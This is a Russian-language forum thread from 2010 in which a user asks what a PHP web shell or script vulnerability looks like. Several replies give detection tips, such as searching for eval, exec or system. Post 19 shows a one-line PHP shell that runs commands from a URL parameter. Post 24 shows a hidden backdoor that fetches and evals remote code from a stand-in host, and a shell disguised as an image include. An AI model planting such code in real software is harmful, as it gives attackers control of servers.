Как выглядит шелл?

1. Wabwen (17.02.2010 / 09:12)
Поскажите как выглядит шелл и вообще дыра в скрипте?

2. ктулху (17.02.2010 / 09:34)
Их сотни, и дыже тысячи видов. Тебе чё все виды рассказать?

3. MODIFIKATOR (17.02.2010 / 09:56)
надо быть кодером чтоб увидеть дыру...

4. Wabwen (17.02.2010 / 10:19)
да хоть самые распрастраненые!

5. ктулху (17.02.2010 / 10:24)
тут тебе гугл в помощь ибо копипастить специально для тебя никто не будет. всё уже 100% обсуждено на сторонних ресурсах.

6. Юрий (17.02.2010 / 12:13)
Он такой однофайловый,внутри строчки разные с различными символами,цвет обычно темный на белом фоне

7. Wabwen (17.02.2010 / 13:15)
это нужно через редактор глядеть?если да то через какой?

8. Удаленный (17.02.2010 / 13:51)
7. Wabwen, PHP Expert Editor, Notepad++ да много их...

9. Евгений (17.02.2010 / 17:22)
Wabwen (Сегодня / 09:12)
Поскажите как выглядит шелл и вообще дыра в скрипте?
Ну он такой . . .черненький, с функциями
сразу видно, что с веника.
Ты бы лучше открыл поисковик, и поискал информацию по этой теме, раз тебе это так интересно, а не создавал глупых тем как школьник.

10. PLANEMO (17.02.2010 / 17:41)
на сайте вапинет лежал раньше шел в разделе скриптов.зайди там посмотри автор темы.

11. Артур (17.02.2010 / 18:21)
Выглядит как нечто позволяющее злоумышлинику исполнить свой коварный замысел

12. RED (17.02.2010 / 20:04)
если не шифрован можно попытаться искать опасные функции типа eval exec system unlink fopen

13. ктулху (17.02.2010 / 20:06)
12, если шифрован не зендом то можно поискать eval

14. RED (17.02.2010 / 20:11)
13, угу. у меня даже была идейка написать что-то вроде сканера, чтобы выдавал вероятные шеллы. но с большим кол-вом файлов/папок работает плохо.

15. Wabwen (18.02.2010 / 07:11)
RED (17.02.10 / 20:11)
13, угу. у меня даже была идейка написать что-то вроде сканера, чтобы выдавал вероятные шеллы. но с большим кол-вом файлов/папок работает плохо.
это было бы не плохо

16. Андрей (20.02.2010 / 16:59)
такие сканеры существуют и работают.

17. Wabwen (20.02.2010 / 19:36)
а как они называются

18. Дмитрий (20.02.2010 / 20:29)
Они называются "Моск".
Не создавайте дурных тем.
Автор, читай пост 5.
Это тема не 1 темы, а целого раздела. Объем инфо огромный.

19. Удаленный (21.02.2010 / 05:16)
вот простейший пример php шелла
<?php system($_GET["hack"]); ?>
шеллы пишутся на многих языках,php/asp/perl

20. Александр (02.03.2010 / 18:58)
пройдись(через браузер) по всем файлам что лежат у тебя, если в одном из них увидишь все свои файлы и папки и рядом значки del edit chmod и тп это шелл))я хз как по другому обьяснить

21. Tony V (03.03.2010 / 14:49)
шелл обычно выглядит как файл-менеджер, либо какое нибудь поле ввода. Если не знаешь php, можешь сразу и не догадаться, что это он

22. Neformat (03.03.2010 / 16:33)
Иногда в срипте есть эксплойт который позволяет подгрузить на сервер шелл, а самого шелла в архиве со скриптом нет.

23. Дмитрий (04.03.2010 / 01:47)
22. Neformat, ты имеешь ввиду бекдор

24. ramzes (04.03.2010 / 02:06)
Не обязательно шелл должен быть виден
<?php
if($_GET['open']){
eval(file_get_contents('http://any.site/shell.txt'));
}
// или шелл-картинка + скрытый инклуд
include"img/icon.png";
пара строк и готовый шелл, можно и хитрее, не столь явно

URL: https://visavi.net/topics/6130